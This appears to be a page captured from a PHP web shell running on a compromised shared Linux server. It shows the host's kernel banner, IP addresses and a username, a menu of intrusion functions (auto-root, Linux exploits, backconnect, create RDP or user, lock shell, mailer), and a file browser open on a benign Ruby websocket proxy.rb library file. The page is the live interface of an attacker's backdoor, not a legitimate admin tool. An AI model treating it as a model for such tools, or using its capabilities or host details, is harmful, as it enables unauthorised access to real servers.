Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
websocket /
driver /
[ HOME SHELL ]
Name
Size
Permission
Action
hybi
[ DIR ]
drwxr-xr-x
client.rb
3.91
KB
-rw-r--r--
draft75.rb
2.39
KB
-rw-r--r--
draft76.rb
2.35
KB
-rw-r--r--
event_emitter.rb
1.14
KB
-rw-r--r--
headers.rb
860
B
-rw-r--r--
hybi.rb
11.94
KB
-rw-r--r--
proxy.rb
1.7
KB
-rw-r--r--
server.rb
1.81
KB
-rw-r--r--
stream_reader.rb
1.09
KB
-rw-r--r--
utf8_match.rb
345
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : proxy.rb
module WebSocket class Driver class Proxy include EventEmitter PORTS = {'ws' => 80, 'wss' => 443} attr_reader :status, :headers def initialize(client, origin, options) super() @client = client @http = HTTP::Response.new @socket = client.instance_variable_get(:@socket) @origin = URI.parse(@socket.url) @url = URI.parse(origin) @options = options @state = 0 @headers = Headers.new @headers['Host'] = @origin.host + (@origin.port ? ":#{@origin.port}" : '') @headers['Connection'] = 'keep-alive' @headers['Proxy-Connection'] = 'keep-alive' if @url.user auth = Base64.strict_encode64([@url.user, @url.password] * ':') @headers['Proxy-Authorization'] = 'Basic ' + auth end end def set_header(name, value) return false unless @state == 0 @headers[name] = value true end def start return false unless @state == 0 @state = 1 port = @origin.port || PORTS[@origin.scheme] start = "CONNECT #{@origin.host}:#{port} HTTP/1.1" headers = [start, @headers.to_s, ''] @socket.write(Driver.encode(headers.join("\r\n"), :binary)) true end def parse(chunk) @http.parse(chunk) return unless @http.complete? @status = @http.code @headers = Headers.new(@http.headers) if @status == 200 emit(:connect, ConnectEvent.new) else message = "Can't establish a connection to the server at #{@socket.url}" emit(:error, ProtocolError.new(message)) end end end end end
Close